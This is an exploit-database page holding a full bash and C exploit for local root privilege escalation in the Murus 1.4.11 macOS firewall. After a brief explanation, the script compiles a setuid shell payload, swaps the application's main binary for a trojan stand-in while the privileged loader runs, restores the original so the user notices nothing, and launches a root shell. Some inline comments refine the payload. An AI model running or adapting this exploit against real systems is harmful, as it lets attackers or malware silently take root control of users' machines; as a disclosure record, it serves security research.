Murus 1.4.11 – Local Privilege Escalation

  • 作者: Mark Wadham
    日期: 2017-12-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43217/
  • # I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus
    # firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings.
    
    # If a local attacker or malware is running as an admin user (i.e. one with write access to /Applications/), it can subvert this process to silently obtain
    # root access without the user noticing.
    
    # https://m4.rkw.io/murus1.4.11.sh.txt
    # 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301
    # -------------------------------------------------------------------------------
    #!/bin/bash
    
    ##################################################################
    ###### Murus 1.4.11 local root privilege escalation exploit ######
    ###### by m4rkw - https://m4.rkw.io/blog.html ######
    ##################################################################
    
    echo "compiling payloads..."
    
    cat > /tmp/murus411_exp.c <<EOF
    #include <unistd.h>
    int main()
    {
    setuid(0);
    seteuid(0);
    execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL);
    return 0;
    }
    EOF
    
    gcc -o /tmp/murus411_exp /tmp/murus411_exp.c
    
    if [ ! $? -eq 0 ] ; then
    rm -f /tmp/murus411_exp.c
    	echo "failed to compile, dev tools may not be installed"
    exit 1
    fi
    
    rm -f /tmp/murus411_exp.c
    
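    # Payload 2: the stand-in for the Murus main binary.  When it is launched
    # in the privileged context it (1) makes payload 1 root-owned and setuid,
    # (2) puts the real Murus binary back so the app keeps working, and
    # (3) execs the real binary so the user sees nothing unusual.
    # Plain libc calls replace the original system() invocations so that no
    # shell is spawned from the privileged context.
    # NOTE(review): /tmp/murus411_exp is a fixed, predictable path in a shared
    # directory; whatever file sits there when this runs becomes setuid-root.
    cat > /tmp/murus411_exp2.c <<EOF
    #include <stdio.h>
    #include <sys/stat.h>
    #include <unistd.h>

    #define PAYLOAD    "/tmp/murus411_exp"
    #define MURUS      "/Applications/Murus.app/Contents/MacOS/Murus"
    #define MURUS_ORIG MURUS ".orig"

    int main(void)
    {
        setuid(0);
        seteuid(0);
        /* chown before chmod: changing ownership may clear setuid bits, so the
         * bit is set last. */
        if (chown(PAYLOAD, 0, 0) != 0)
            perror("chown");
        if (chmod(PAYLOAD, S_ISUID | 0755) != 0)
            perror("chmod");
        /* Always try to restore the real binary, even if the steps above failed,
         * so the application is not left broken. */
        if (rename(MURUS_ORIG, MURUS) != 0)
            perror("rename");
        execl(MURUS, "Murus", NULL);
        return 1;
    }
    EOF

    # The original script never checked this compile; a failure here would
    # have planted a non-existent file.  Clean up payload 1 on the way out.
    if ! gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c; then
        rm -f /tmp/murus411_exp2.c /tmp/murus411_exp
        echo "failed to compile second payload"
        exit 1
    fi

    rm -f /tmp/murus411_exp2.c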
    
    echo "waiting for loader..."
    
    while :
    do
    ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \
    |grep -v grep 1>/dev/null
    if [ $? -eq 0 ] ; then
    break
    fi
    done
    
    echo "planting payload..."
    
    mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\
    Contents/MacOS/Murus.orig
    mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus
    
    echo "waiting for payload to trigger..."
    
    while :
    do
    r=`ls -la /tmp/murus411_exp |grep root`
    if [ "$r" != "" ] ; then
    break
    fi
    sleep 0.1
    done
    
    echo "kapow"
    
    /tmp/murus411_exp